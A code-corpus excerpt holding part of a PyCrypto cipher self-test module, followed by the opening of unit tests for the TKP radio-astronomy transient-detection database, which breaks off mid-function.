if ctr_params.has_key('suffix'): ctr_params['suffix'] = a2b_hex(b(ctr_params['suffix']))
if not ctr_params.has_key('nbits'):
ctr_params['nbits'] = 8*(self.module.block_size - len(ctr_params.get('prefix', '')) - len(ctr_params.get('suffix', '')))
params['counter'] = ctr_class(**ctr_params)
if self.mode is None:
# Stream cipher
return self.module.new(a2b_hex(self.key), **params)
elif self.iv is None:
# Block cipher without iv
return self.module.new(a2b_hex(self.key), self.mode, **params)
else:
# Block cipher with iv
if do_decryption and self.mode == self.module.MODE_OPENPGP:
# In PGP mode, the IV to feed for decryption is the *encrypted* one
return self.module.new(a2b_hex(self.key), self.mode, a2b_hex(self.encrypted_iv), **params)
else:
return self.module.new(a2b_hex(self.key), self.mode, a2b_hex(self.iv), **params)
def runTest(self):
plaintext = a2b_hex(self.plaintext)
ciphertext = a2b_hex(self.ciphertext)
ct1 = b2a_hex(self._new().encrypt(plaintext))
pt1 = b2a_hex(self._new(1).decrypt(ciphertext))
ct2 = b2a_hex(self._new().encrypt(plaintext))
pt2 = b2a_hex(self._new(1).decrypt(ciphertext))
if hasattr(self.module, "MODE_OPENPGP") and self.mode == self.module.MODE_OPENPGP:
# In PGP mode, data returned by the first encrypt()
# is prefixed with the encrypted IV.
# Here we check it and then remove it from the ciphertexts.
eilen = len(self.encrypted_iv)
self.assertEqual(self.encrypted_iv, ct1[:eilen])
self.assertEqual(self.encrypted_iv, ct2[:eilen])
ct1 = ct1[eilen:]
ct2 = ct2[eilen:]
self.assertEqual(self.ciphertext, ct1) # encrypt
self.assertEqual(self.ciphertext, ct2) # encrypt (second time)
self.assertEqual(self.plaintext, pt1) # decrypt
self.assertEqual(self.plaintext, pt2) # decrypt (second time)
class CipherStreamingSelfTest(CipherSelfTest):
def shortDescription(self):
desc = self.module_name
if self.mode is not None:
desc += " in %s mode" % (self.mode_name,)
return "%s should behave like a stream cipher" % (desc,)
def runTest(self):
plaintext = a2b_hex(self.plaintext)
ciphertext = a2b_hex(self.ciphertext)
# The cipher should work like a stream cipher
# Test counter mode encryption, 3 bytes at a time
ct3 = []
cipher = self._new()
for i in range(0, len(plaintext), 3):
ct3.append(cipher.encrypt(plaintext[i:i+3]))
ct3 = b2a_hex(b("").join(ct3))
self.assertEqual(self.ciphertext, ct3) # encryption (3 bytes at a time)
# Test counter mode decryption, 3 bytes at a time
pt3 = []
cipher = self._new()
for i in range(0, len(ciphertext), 3):
pt3.append(cipher.encrypt(ciphertext[i:i+3]))
# PY3K: This is meant to be text, do not change to bytes (data)
pt3 = b2a_hex(b("").join(pt3))
self.assertEqual(self.plaintext, pt3) # decryption (3 bytes at a time)
class CTRSegfaultTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
self.key = b(params['key'])
self.module_name = params.get('module_name', None)
def shortDescription(self):
return """Regression test: %s.new(key, %s.MODE_CTR) should raise TypeError, not segfault""" % (self.module_name, self.module_name)
def runTest(self):
self.assertRaises(TypeError, self.module.new, a2b_hex(self.key), self.module.MODE_CTR)
class CTRWraparoundTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
self.key = b(params['key'])
self.module_name = params.get('module_name', None)
def shortDescription(self):
return """Regression test: %s with MODE_CTR should raise OverflowError on wraparound when shortcut used""" % (self.module_name,)
def runTest(self):
from Crypto.Util import Counter
for disable_shortcut in (0, 1): # (False, True) Test CTR-mode shortcut and PyObject_CallObject code paths
for little_endian in (0, 1): # (False, True) Test both endiannesses
ctr = Counter.new(8*self.module.block_size, initial_value=2L**(8*self.module.block_size)-1, little_endian=little_endian, disable_shortcut=disable_shortcut)
cipher = self.module.new(a2b_hex(self.key), self.module.MODE_CTR, counter=ctr)
block = b("\x00") * self.module.block_size
cipher.encrypt(block)
self.assertRaises(OverflowError, cipher.encrypt, block)
class CFBSegmentSizeTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
self.key = b(params['key'])
self.description = params['description']
def shortDescription(self):
return self.description
def runTest(self):
"""Regression test: m.new(key, m.MODE_CFB, segment_size=N) should require segment_size to be a multiple of 8 bits"""
for i in range(1, 8):
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key), self.module.MODE_CFB, segment_size=i)
self.module.new(a2b_hex(self.key), self.module.MODE_CFB, "\0"*self.module.block_size, segment_size=8) # should succeed
class RoundtripTest(unittest.TestCase):
def __init__(self, module, params):
from Crypto import Random
unittest.TestCase.__init__(self)
self.module = module
self.iv = Random.get_random_bytes(module.block_size)
self.key = b(params['key'])
self.plaintext = 100 * b(params['plaintext'])
self.module_name = params.get('module_name', None)
def shortDescription(self):
return """%s .decrypt() output of .encrypt() should not be garbled""" % (self.module_name,)
def runTest(self):
for mode in (self.module.MODE_ECB, self.module.MODE_CBC, self.module.MODE_CFB, self.module.MODE_OFB, self.module.MODE_OPENPGP):
encryption_cipher = self.module.new(a2b_hex(self.key), mode, self.iv)
ciphertext = encryption_cipher.encrypt(self.plaintext)
if mode != self.module.MODE_OPENPGP:
decryption_cipher = self.module.new(a2b_hex(self.key), mode, self.iv)
else:
eiv = ciphertext[:self.module.block_size+2]
ciphertext = ciphertext[self.module.block_size+2:]
decryption_cipher = self.module.new(a2b_hex(self.key), mode, eiv)
decrypted_plaintext = decryption_cipher.decrypt(ciphertext)
self.assertEqual(self.plaintext, decrypted_plaintext)
class PGPTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
self.key = b(params['key'])
def shortDescription(self):
return "MODE_PGP was implemented incorrectly and insecurely. It's completely banished now."
def runTest(self):
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
self.module.MODE_PGP)
class IVLengthTest(unittest.TestCase):
def __init__(self, module, params):
unittest.TestCase.__init__(self)
self.module = module
self.key = b(params['key'])
def shortDescription(self):
return "Check that all modes except MODE_ECB and MODE_CTR require an IV of the proper length"
def runTest(self):
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
self.module.MODE_CBC, "")
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
self.module.MODE_CFB, "")
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
self.module.MODE_OFB, "")
self.assertRaises(ValueError, self.module.new, a2b_hex(self.key),
self.module.MODE_OPENPGP, "")
self.module.new(a2b_hex(self.key), self.module.MODE_ECB, "")
self.module.new(a2b_hex(self.key), self.module.MODE_CTR, "", counter=self._dummy_counter)
def _dummy_counter(self):
return "\0" * self.module.block_size
def make_block_tests(module, module_name, test_data):
tests = []
extra_tests_added = 0
for i in range(len(test_data)):
row = test_data[i]
# Build the "params" dictionary
params = {'mode': 'ECB'}
if len(row) == 3:
(params['plaintext'], params['ciphertext'], params['key']) = row
elif len(row) == 4:
(params['plaintext'], params['ciphertext'], params['key'], params['description']) = row
elif len(row) == 5:
(params['plaintext'], params['ciphertext'], params['key'], params['description'], extra_params) = row
params.update(extra_params)
else:
raise AssertionError("Unsupported tuple size %d" % (len(row),))
# Build the display-name for the test
p2 = params.copy()
p_key = _extract(p2, 'key')
p_plaintext = _extract(p2, 'plaintext')
p_ciphertext = _extract(p2, 'ciphertext')
p_description = _extract(p2, 'description', None)
p_mode = p2.get('mode', 'ECB')
if p_mode == 'ECB':
_extract(p2, 'mode', 'ECB')
if p_description is not None:
description = p_description
elif p_mode == 'ECB' and not p2:
description = "p=%s, k=%s" % (p_plaintext, p_key)
else:
description = "p=%s, k=%s, %r" % (p_plaintext, p_key, p2)
name = "%s #%d: %s" % (module_name, i+1, description)
params['description'] = name
params['module_name'] = module_name
# Add extra test(s) to the test suite before the current test
if not extra_tests_added:
tests += [
CTRSegfaultTest(module, params),
CTRWraparoundTest(module, params),
CFBSegmentSizeTest(module, params),
RoundtripTest(module, params),
PGPTest(module, params),
IVLengthTest(module, params),
]
extra_tests_added = 1
# Add the current test to the test suite
tests.append(CipherSelfTest(module, params))
# When using CTR mode, test that the interface behaves like a stream cipher
if p_mode == 'CTR':
tests.append(CipherStreamingSelfTest(module, params))
# When using CTR mode, test the non-shortcut code path.
if p_mode == 'CTR' and not params.has_key('ctr_class'):
params2 = params.copy()
params2['description'] += " (shortcut disabled)"
ctr_params2 = params.get('ctr_params', {}).copy()
params2['ctr_params'] = ctr_params2
if not params2['ctr_params'].has_key('disable_shortcut'):
params2['ctr_params']['disable_shortcut'] = 1
tests.append(CipherSelfTest(module, params2))
return tests
def make_stream_tests(module, module_name, test_data):
tests = []
for i in range(len(test_data)):
row = test_data[i]
# Build the "params" dictionary
params = {}
if len(row) == 3:
(params['plaintext'], params['ciphertext'], params['key']) = row
elif len(row) == 4:
(params['plaintext'], params['ciphertext'], params['key'], params['description']) = row
elif len(row) == 5:
(params['plaintext'], params['ciphertext'], params['key'], params['description'], extra_params) = row
params.update(extra_params)
else:
raise AssertionError("Unsupported tuple size %d" % (len(row),))
# Build the display-name for the test
p2 = params.copy()
p_key = _extract(p2, 'key')
p_plaintext = _extract(p2, 'plaintext')
p_ciphertext = _extract(p2, 'ciphertext')
p_description = _extract(p2, 'description', None)
if p_description is not None:
description = p_description
elif not p2:
description = "p=%s, k=%s" % (p_plaintext, p_key)
else:
description = "p=%s, k=%s, %r" % (p_plaintext, p_key, p2)
name = "%s #%d: %s" % (module_name, i+1, description)
params['description'] = name
params['module_name'] = module_name
# Add the test to the test suite
tests.append(CipherSelfTest(module, params))
tests.append(CipherStreamingSelfTest(module, params))
return tests
# vim:set ts=4 sw=4 sts=4 expandtab:
| gpl-3.0 |
transientskp/tkp | tests/test_database/test_transients.py | 1 | 37227 | import unittest
from collections import defaultdict
import tkp.db
from tkp.db.associations import associate_extracted_sources
from tkp.db.general import insert_extracted_sources, frequency_bands, runcat_entries
from tkp.testutil import db_subs
from tkp.testutil.db_subs import (example_extractedsource_tuple,
MockSource,
insert_image_and_simulated_sources,
get_newsources_for_dataset,
get_sources_filtered_by_final_variability)
from tkp.testutil.decorators import requires_database
# Convenient default values
deRuiter_r = 3.7
class TestSimplestCases(unittest.TestCase):
"""
Various basic test-cases of the transient-detection logic.
In these simple cases we just have one source, fixed image properties,
and identical min/max image RMS values.
As a result, we can only test for type 1 / 2 transients here, i.e.
-type 1: single-epoch, bright enough that we would previously have seen it
wherever in the image it lies, or
-type 2: multi-epoch, identified by variability, possibly from forced-fits.
(Type 0 is a possible single-epoch transient, that might just be a steady
source fluctuating in a high-RMS region, or might be real transient
if it's seen in the low-RMS region).
"""
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(database=self.database,
data={'description':"Trans:"
+ self._testMethodName})
self.n_images = 4
self.new_source_sigma_margin = 3
image_rms = 1e-3
detection_thresh=10
self.search_params = dict(eta_min=1,
v_min=0.1,
# minpoints=1,
)
self.barely_detectable_flux = 1.01*image_rms*(detection_thresh)
self.reliably_detectable_flux = (
1.01*image_rms*(detection_thresh+self.new_source_sigma_margin))
# 1mJy image RMS, 10-sigma detection threshold = 10mJy threshold.
test_specific_img_params = dict(rms_qc = image_rms,
rms_min = image_rms,
rms_max = image_rms,
detection_thresh = detection_thresh)
self.im_params = db_subs.generate_timespaced_dbimages_data(
self.n_images,**test_specific_img_params)
def tearDown(self):
tkp.db.rollback()
def test_steady_source(self):
"""
Sanity check: Ensure we get no newsource table entries for a steady
source.
"""
im_params = self.im_params
steady_src = db_subs.MockSource(
template_extractedsource=db_subs.example_extractedsource_tuple(
ra=im_params[0]['centre_ra'],
dec=im_params[0]['centre_decl'],
),
lightcurve=defaultdict(lambda : self.reliably_detectable_flux)
)
inserted_sources = []
for img_pars in im_params:
image, _,forced_fits = insert_image_and_simulated_sources(
self.dataset,img_pars,[steady_src],
self.new_source_sigma_margin)
#should not have any nulldetections
self.assertEqual(len(forced_fits), 0)
transients = get_sources_filtered_by_final_variability(
dataset_id=self.dataset.id, **self.search_params)
newsources = get_newsources_for_dataset(self.dataset.id)
#or newsources, high variability sources
self.assertEqual(len(transients), 0)
self.assertEqual(len(newsources), 0)
def test_single_epoch_bright_transient(self):
"""A bright transient appears at field centre in one image."""
im_params = self.im_params
transient_src = db_subs.MockSource(
template_extractedsource=db_subs.example_extractedsource_tuple(
ra=im_params[0]['centre_ra'],
dec=im_params[0]['centre_decl'],
),
lightcurve={im_params[2]['taustart_ts'] :
self.reliably_detectable_flux}
)
for img_pars in im_params[:3]:
image, _,forced_fits = insert_image_and_simulated_sources(
self.dataset,img_pars,[transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(forced_fits), 0)
# Check the number of detected transients
transients = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(transients), 1)
newsrc_properties = transients[0]
# Check that the bands for the images are the same as the transient's band
freq_bands = frequency_bands(self.dataset._id)
self.assertEqual(len(freq_bands), 1)
self.assertEqual(freq_bands[0], newsrc_properties['band'])
# Sanity check that the runcat is correctly matched
runcats = runcat_entries(self.dataset._id)
self.assertEqual(len(runcats), 1)
self.assertEqual(runcats[0]['runcat'], newsrc_properties['runcat_id'])
# Since it is a single-epoch source, variability indices default to 0:
self.assertEqual(newsrc_properties['v_int'],0)
self.assertEqual(newsrc_properties['eta_int'],0)
# Bright 'new-source' / single-epoch transient; should have high sigmas:
self.assertTrue(
newsrc_properties['low_thresh_sigma']> self.new_source_sigma_margin)
self.assertEqual(newsrc_properties['low_thresh_sigma'],
newsrc_properties['high_thresh_sigma'])
# Check the correct trigger xtrsrc was identified:
self.assertEqual(newsrc_properties['taustart_ts'],
transient_src.lightcurve.keys()[0])
# Ok, now add the last image and check that we get a correct forced-fit
# request:
image, _,forced_fits = insert_image_and_simulated_sources(
self.dataset,im_params[3],[transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(forced_fits),1)
transients = get_sources_filtered_by_final_variability(
dataset_id=self.dataset.id,**self.search_params)
self.assertEqual(len(transients), 1)
transient_properties = transients[0]
# And now we should have a non-zero variability value
self.assertNotAlmostEqual(transient_properties['v_int'], 0)
self.assertNotAlmostEqual(transient_properties['eta_int'], 0)
def test_single_epoch_weak_transient(self):
"""
A weak (barely detected in blind extraction) transient appears at
field centre in one image, then disappears entirely.
Because it is a weak extraction, it will not be immediately marked
as transient, but it will get flagged up after forced-fitting due to
the variability search.
"""
im_params = self.im_params
transient_src = db_subs.MockSource(
template_extractedsource=db_subs.example_extractedsource_tuple(
ra=im_params[0]['centre_ra'],
dec=im_params[0]['centre_decl'],
),
lightcurve={im_params[2]['taustart_ts'] :
self.barely_detectable_flux}
)
for img_pars in im_params[:3]:
image, _, forced_fits = insert_image_and_simulated_sources(
self.dataset, img_pars, [transient_src],
self.new_source_sigma_margin)
self.assertEqual(forced_fits, [])
newsources = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(newsources), 0)
transients = get_sources_filtered_by_final_variability(
dataset_id=self.dataset.id, **self.search_params)
# No variability yet
self.assertEqual(len(transients), 0)
# Now, the final, empty image:
image, blind_extractions, forced_fits = insert_image_and_simulated_sources(
self.dataset, im_params[3], [transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(blind_extractions), 0)
self.assertEqual(len(forced_fits), 1)
# No changes to newsource table
newsources = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(newsources), 0)
# But it now has high variability
transients = get_sources_filtered_by_final_variability(
dataset_id=self.dataset.id, **self.search_params)
self.assertEqual(len(transients), 1)
transient_properties = transients[0]
# Check that the bands for the images are the same as the transient's band
freq_bands = frequency_bands(self.dataset._id)
self.assertEqual(len(freq_bands), 1)
self.assertEqual(freq_bands[0], transient_properties['band'])
# Sanity check that the runcat is correctly matched
runcats = runcat_entries(self.dataset._id)
self.assertEqual(len(runcats), 1)
self.assertEqual(runcats[0]['runcat'], transient_properties['runcat_id'])
def test_multi_epoch_source_flare_and_fade(self):
"""
A steady source (i.e. detected in first image) flares up,
then fades and finally disappears.
"""
im_params = self.im_params
transient_src = db_subs.MockSource(
template_extractedsource=db_subs.example_extractedsource_tuple(
ra=im_params[0]['centre_ra'],
dec=im_params[0]['centre_decl'],
),
lightcurve={
im_params[0]['taustart_ts'] : self.barely_detectable_flux,
im_params[1]['taustart_ts'] : 2*self.barely_detectable_flux,
im_params[2]['taustart_ts'] : self.barely_detectable_flux,
}
)
inserted_sources = []
for img_pars in im_params[:2]:
image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
self.dataset,img_pars,[transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(forced_fits), 0)
inserted_sources.extend(blind_xtr)
#This should always be 0:
newsources = get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(newsources), 0)
transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
**self.search_params)
#We've seen a flare:
self.assertEqual(len(transients), 1)
transient_properties = transients[0]
# Check that the bands for the images are the same as the transient's band
freq_bands = frequency_bands(self.dataset._id)
self.assertEqual(len(freq_bands), 1)
self.assertEqual(freq_bands[0], transient_properties['band'])
#Sanity check that the runcat is correctly matched
runcats = runcat_entries(self.dataset._id)
self.assertEqual(len(runcats), 1)
self.assertEqual(runcats[0]['runcat'], transient_properties['runcat_id'])
#Check we have sensible variability indices
# print "\n",transient_properties
metrics = db_subs.lightcurve_metrics(inserted_sources)
# print "\nAfter two images:"
for metric_name in 'v_int', 'eta_int':
# print metric_name, transient_properties[metric_name]
self.assertAlmostEqual(transient_properties[metric_name],
metrics[-1][metric_name])
#Add 3rd image (another blind detection), check everything is sane
image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
self.dataset,im_params[2],[transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(forced_fits), 0)
inserted_sources.extend(blind_xtr)
self.assertEqual(len(get_newsources_for_dataset(self.dataset.id)),0)
# Ok, now add the last image and check that we get a correct forced-fit
# request:
image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
self.dataset,im_params[3],[transient_src],
self.new_source_sigma_margin)
self.assertEqual(len(blind_xtr),0)
self.assertEqual(len(forced_fits),1)
inserted_sources.extend(forced_fits)
self.assertEqual(len(get_newsources_for_dataset(self.dataset.id)),0)
transients = get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
**self.search_params)
# Variability indices should take non-detections into account
self.assertEqual(len(transients), 1)
transient_properties = transients[0]
metrics = db_subs.lightcurve_metrics(inserted_sources)
# print "\nAfter four images:"
for metric_name in 'v_int', 'eta_int':
# print metric_name, transient_properties[metric_name]
self.assertAlmostEqual(transient_properties[metric_name],
metrics[-1][metric_name])
class TestDecreasingImageRMS(unittest.TestCase):
"""
These unit-tests enumerate the possible cases where we process an image
with a lower RMS value, and see a new source. Is it a transient, or
just a steady source that was lost in the noise before?
"""
def shortDescription(self):
return None
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(
data={'description':"Trans:" +self._testMethodName},
database=self.database)
self.n_images = 2
self.rms_min_initial = 2e-3 #2mJy
self.rms_max_initial = 5e-3 #5mJy
self.new_source_sigma_margin = 3
self.detection_thresh=10
dt=self.detection_thresh
margin = self.new_source_sigma_margin
#These all refer to the first image, they should all be clearly
#detected in the second image:
self.barely_detectable_flux = 1.01*self.rms_min_initial*dt
self.reliably_detected_at_image_centre_flux = (
1.01*self.rms_min_initial*(dt+ margin))
self.always_detectable_flux = 1.01*self.rms_max_initial*(dt+ margin)
test_specific_img_params = dict(rms_qc = self.rms_min_initial,
rms_min = self.rms_min_initial,
rms_max = self.rms_max_initial,
detection_thresh = self.detection_thresh)
self.img_params = db_subs.generate_timespaced_dbimages_data(
self.n_images, **test_specific_img_params)
#Drop RMS to 1 mJy / 2.5mJy in second image.
rms_decrease_factor = 0.5
self.img_params[1]['rms_qc']*=rms_decrease_factor
self.img_params[1]['rms_min']*=rms_decrease_factor
self.img_params[1]['rms_max']*=rms_decrease_factor
def tearDown(self):
tkp.db.rollback()
def test_certain_transient(self):
"""
flux1 > (rms_max0*(det0+margin)
--> Definite transient
Nice and bright, must be new - mark it definite transient.
"""
img_params = self.img_params
bright_transient = MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
dec=img_params[0]['centre_decl']),
lightcurve={img_params[1]['taustart_ts']:
self.always_detectable_flux}
)
#First, check that we've set up the test correctly:
rms_max0 = img_params[0]['rms_max']
det0 = img_params[0]['detection_thresh']
self.assertTrue(bright_transient.lightcurve.values()[0] >
rms_max0*(det0 + self.new_source_sigma_margin ) )
for pars in self.img_params:
img = tkp.db.Image(data=pars,dataset=self.dataset)
xtr = bright_transient.simulate_extraction(img,
extraction_type='blind')
if xtr is not None:
insert_extracted_sources(img._id, [xtr], 'blind')
associate_extracted_sources(img._id, deRuiter_r, self.new_source_sigma_margin)
newsources = get_newsources_for_dataset(self.dataset.id)
#Should have one 'definite' transient
self.assertEqual(len(newsources),1)
self.assertTrue(
newsources[0]['low_thresh_sigma'] > self.new_source_sigma_margin)
self.assertTrue(
newsources[0]['high_thresh_sigma'] > self.new_source_sigma_margin)
self.assertTrue(
newsources[0]['low_thresh_sigma'] >
newsources[0]['high_thresh_sigma'])
def test_marginal_transient(self):
"""
( flux1 > (rms_min0*(det0 + margin) )
but ( flux1 < (rms_max0*(det0 + margin) )
--> Possible transient
If it was in a region of rms_min, we would (almost certainly) have seen
it in the first image. So new source --> Possible transient.
But if it was in a region of rms_max, then perhaps we would have missed
it. In which case, new source --> Just seeing deeper.
Note that if we are tiling overlapping images, then the first time
a field is processed with image-centre at the edge of the old field,
we may get a bunch of unhelpful 'possible transients'.
Furthermore, this will pick up fluctuating sources near the
image-margins even with a fixed field of view.
But without a more complex store of image-rms-per-position, we cannot
do better.
Hopefully we can use a 'distance from centre' feature to separate out
the good and bad candidates in this case.
"""
img_params = self.img_params
#Must pick flux value carefully to fire correct logic branch:
marginal_transient_flux = self.reliably_detected_at_image_centre_flux
marginal_transient = MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
dec=img_params[0]['centre_decl']),
lightcurve={img_params[1]['taustart_ts'] : marginal_transient_flux}
)
# First, check that we've set up the test correctly
rms_min0 = img_params[0]['rms_min']
rms_max0 = img_params[0]['rms_max']
det0 = img_params[0]['detection_thresh']
self.assertTrue(marginal_transient_flux <
rms_max0 * (det0 + self.new_source_sigma_margin))
self.assertTrue(marginal_transient_flux >
rms_min0 * (det0 + self.new_source_sigma_margin))
for pars in self.img_params:
img = tkp.db.Image(data=pars, dataset=self.dataset)
xtr = marginal_transient.simulate_extraction(img,
extraction_type='blind')
if xtr is not None:
insert_extracted_sources(img._id, [xtr], 'blind')
associate_extracted_sources(img._id, deRuiter_r, self.new_source_sigma_margin)
newsources = get_newsources_for_dataset(self.dataset.id)
# Should have one 'possible' transient
self.assertEqual(len(newsources), 1)
self.assertTrue(
newsources[0]['low_thresh_sigma'] > self.new_source_sigma_margin)
self.assertTrue(
newsources[0]['high_thresh_sigma'] < self.new_source_sigma_margin)
def test_probably_not_a_transient(self):
"""
( flux1 < (rms_min0*(det0 + margin) )
--> Probably not a transient
NB even if
avg_source_flux == rms_min0*det0 + epsilon
we might not detect it in the
first image, due to noise fluctuations. So we provide the
user-tunable marginal_detection_thresh, to ignore these 'noise'
transients.
"""
img_params = self.img_params
img0 = img_params[0]
marginal_steady_src_flux = self.barely_detectable_flux
# This time around, we just manually exclude the steady src from
# the first image detections.
marginal_steady_src = MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
dec=img_params[0]['centre_decl']
),
lightcurve=defaultdict(lambda :marginal_steady_src_flux)
)
# First, check that we've set up the test correctly
rms_min0 = img_params[0]['rms_min']
det0 = img_params[0]['detection_thresh']
self.assertTrue(marginal_steady_src_flux <
rms_min0 * (det0 + self.new_source_sigma_margin))
# Insert first image, no sources.
tkp.db.Image(data=img_params[0], dataset=self.dataset)
# Now set up second image.
img1 = tkp.db.Image(data=img_params[1], dataset=self.dataset)
xtr = marginal_steady_src.simulate_extraction(img1,
extraction_type='blind')
insert_extracted_sources(img1._id, [xtr], 'blind')
associate_extracted_sources(img1._id, deRuiter_r, self.new_source_sigma_margin)
newsources = get_newsources_for_dataset(self.dataset.id)
# Should have no flagged new sources
self.assertEqual(len(newsources), 0)
class TestIncreasingImageRMS(unittest.TestCase):
def shortDescription(self):
return None
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(
data={'description':"Trans:" +self._testMethodName},
database=self.database)
self.n_images = 2
self.rms_min_initial = 2e-3 #2mJy
self.rms_max_initial = 5e-3 #5mJy
self.new_source_sigma_margin = 3
self.detection_thresh=10
dt=self.detection_thresh
self.barely_detectable_flux = 1.01*dt*self.rms_min_initial
test_specific_img_params = dict(rms_qc = self.rms_min_initial,
rms_min = self.rms_min_initial,
rms_max = self.rms_max_initial,
detection_thresh = self.detection_thresh)
self.img_params = db_subs.generate_timespaced_dbimages_data(
self.n_images, **test_specific_img_params)
#Increase RMS to 4 mJy / 10mJy in second image.
rms_increase_factor = 2.0
self.img_params[1]['rms_qc']*=rms_increase_factor
self.img_params[1]['rms_min']*=rms_increase_factor
self.img_params[1]['rms_max']*=rms_increase_factor
self.search_params = dict(eta_min=1,
v_min=0.1,
# minpoints=1,
)
def tearDown(self):
tkp.db.rollback()
def test_null_detection_business_as_usual(self):
"""
If we do not blindly extract a steady source due to increased RMS,
then we expect a null-detection forced-fit to be triggered.
However, if the source properties are steady, this should not
result in the source being identified as transient.
"""
img0 = self.img_params[0]
steady_src_flux = self.barely_detectable_flux
steady_src = MockSource(
example_extractedsource_tuple(ra=img0['centre_ra'],
dec=img0['centre_decl']
),
lightcurve=defaultdict(lambda :steady_src_flux)
)
image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
self.dataset,self.img_params[0],[steady_src],
self.new_source_sigma_margin)
self.assertEqual(len(blind_xtr),1)
self.assertEqual(len(forced_fits),0)
image, blind_xtr,forced_fits = insert_image_and_simulated_sources(
self.dataset,self.img_params[1],[steady_src],
self.new_source_sigma_margin)
self.assertEqual(len(blind_xtr),0)
self.assertEqual(len(forced_fits),1)
get_sources_filtered_by_final_variability(dataset_id=self.dataset.id,
**self.search_params)
transients=get_newsources_for_dataset(self.dataset.id)
self.assertEqual(len(transients),0)
class TestMultipleFrequencyBands(unittest.TestCase):
"""
We expect to see some steady sources in only one frequency band,
due to steep spectral indices. We don't want to misclassify these as
transient without any proof of variability!
"""
def shortDescription(self):
return None
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(
data={'description':"Trans:" +self._testMethodName},
database=self.database)
self.n_images = 2
self.rms_min = 1e-3 #1mJy
self.rms_max = 2e-3 #2mJy
self.new_source_sigma_margin = 3
self.detection_thresh=10
self.first_image_freq = 250e6 # 250 MHz
self.second_image_freq = 50e6 # 50 MHz
dt=self.detection_thresh
margin = self.new_source_sigma_margin
self.always_detectable_flux = 1.01*self.rms_max*(dt+ margin)
self.search_params = dict(eta_min=1,
v_min=0.1,
minpoints=1, )
test_specific_img_params = dict(
freq_eff = self.first_image_freq,
rms_qc = self.rms_min,
rms_min = self.rms_min,
rms_max = self.rms_max,
detection_thresh = self.detection_thresh)
self.img_params = db_subs.generate_timespaced_dbimages_data(
self.n_images, **test_specific_img_params)
self.img_params[1]['freq_eff']=self.second_image_freq
def tearDown(self):
tkp.db.rollback()
def test_probably_not_a_transient(self):
"""
No source at 250MHz, but we detect a source at 50MHz.
Not necessarily a transient.
Should trivially ignore 250MHz data when looking at a new 50MHz source.
"""
img_params = self.img_params
img0 = img_params[0]
# This time around, we just manually exclude the steady src from
# the first image detections.
steady_low_freq_src = MockSource(
example_extractedsource_tuple(ra=img_params[0]['centre_ra'],
dec=img_params[0]['centre_decl']
),
lightcurve=defaultdict(lambda :self.always_detectable_flux)
)
# Insert first image, no sources.
tkp.db.Image(data=img_params[0],dataset=self.dataset)
# Now set up second image.
img1 = tkp.db.Image(data=img_params[1],dataset=self.dataset)
xtr = steady_low_freq_src.simulate_extraction(img1,
extraction_type='blind')
insert_extracted_sources(img1._id, [xtr], 'blind')
associate_extracted_sources(img1._id, deRuiter_r, self.new_source_sigma_margin)
transients = get_newsources_for_dataset(self.dataset.id)
# Should have no marked transients
self.assertEqual(len(transients), 0)
class TestPreviousLimitsImageId(unittest.TestCase):
"""
If we have several previous images with non-detections at a position,
and then we find a new source, we should store the ID of the image with
the best previous upper limits, so we can later run queries to see how
decisively 'new' (i.e. how much brighter than previous limits)
the new source is.
"""
def shortDescription(self):
return None
@requires_database()
def setUp(self):
self.database = tkp.db.Database()
self.dataset = tkp.db.DataSet(
data={'description':"Trans:" +self._testMethodName},
database=self.database)
self.n_images = 8
self.rms_min_initial = 2e-3 #2mJy
self.rms_max_initial = 5e-3 #5mJy
self.new_source_sigma_margin = 3
self.detection_thresh=10
dt=self.detection_thresh
margin = self.new_source_sigma_margin
self.always_detectable_flux = 1.01*(dt+ margin)*self.rms_max_initial
self.search_params = dict(eta_min=1,
v_min=0.1,
# minpoints=1,
)
test_specific_img_params = dict(rms_qc = self.rms_min_initial,
rms_min = self.rms_min_initial,
rms_max = self.rms_max_initial,
detection_thresh = self.detection_thresh)
self.img_params = db_subs.generate_timespaced_dbimages_data(
self.n_images, **test_specific_img_params)
#Raise RMS in images 0,1,2,6
rms_keys = ['rms_qc', 'rms_min', 'rms_max']
rms_increase_factor = 1.2
for img_index in (0,1,2,6):
for k in rms_keys:
self.img_params[img_index][k]*=rms_increase_factor
# Now, images 3,4,5 are equally good. But if we raise the rms_max in
# images, 3,5 (leave rms_min equal) then we should pick 4 as the best.
# (NB Careful ordering - ensures we're not just picking the best by
# default due to it being first or last in the matching set.)
for img_index in (3,5):
self.img_params[img_index]['rms_max']*=rms_increase_factor
#Drop RMS significantly in last image so we get a detection. (index=7)
rms_decrease_factor = 0.5
for k in rms_keys:
